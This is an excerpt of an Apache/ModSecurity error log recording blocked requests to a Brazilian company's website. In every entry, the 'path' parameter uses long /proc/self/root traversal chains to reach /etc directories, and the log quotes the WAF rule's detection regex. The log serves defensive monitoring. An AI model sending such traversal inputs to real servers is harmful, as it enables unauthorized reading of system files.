"abgRMAlT9VtDQc7bgUylmAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:18:25.610870 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:33458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRMbABkC4fWIHEf8Hi6gAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:18:27.630719 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:58284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRMwlT9VtDQc7bgUylmwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:18:50.318385 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:56524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRSo6lpbStxTqkSktkyAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:18:53.704884 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:44352] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRTbysWC90G-1nBrA8PwAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:19:23.319224 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.241.46:44356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRa3bQATo66fKoS7xF0QAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:19:28.144585 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:58298] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRcNSswJuvopo3lOhXiAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:19:36.350909 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:35810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgReLABkC4fWIHEf8Hi8wAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:19:37.744889 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.241.46:44252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgReQlT9VtDQc7bgUylqgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:19:40.779979 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:44432] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRfI6lpbStxTqkSktk0AAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:19:44.095120 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:42434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRgAlT9VtDQc7bgUylrQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:19:45.564894 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:42436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRgQlT9VtDQc7bgUylrgAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:19:57.224146 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.243.203:42444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRjXjZBu2q05ozVU9N1wAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:20:02.959675 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:57518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRkv9ocpUE4ed4uDzleQAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:20:12.776743 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:44354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRnAlT9VtDQc7bgUyltQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:20:15.403728 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:48168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRn5qj1wV0Si-OkefjIQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:20:17.756862 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.243.203:48174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRoY6lpbStxTqkSktk1AAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:20:24.113342 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.241.46:56714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRqHjZBu2q05ozVU9N9QAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:20:36.340889 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:51040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRtLysWC90G-1nBrA8YgAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:20:37.664036 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.241.46:40438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRtRXjF1vJNtV6CWrvRAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 11:20:48.778537 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:45448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRwLABkC4fWIHEf8HjCAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:20:49.969853 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.241.46:42894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRwQlT9VtDQc7bgUylugAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:20:51.091448 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.241.46:42898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRwwlT9VtDQc7bgUyluwAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
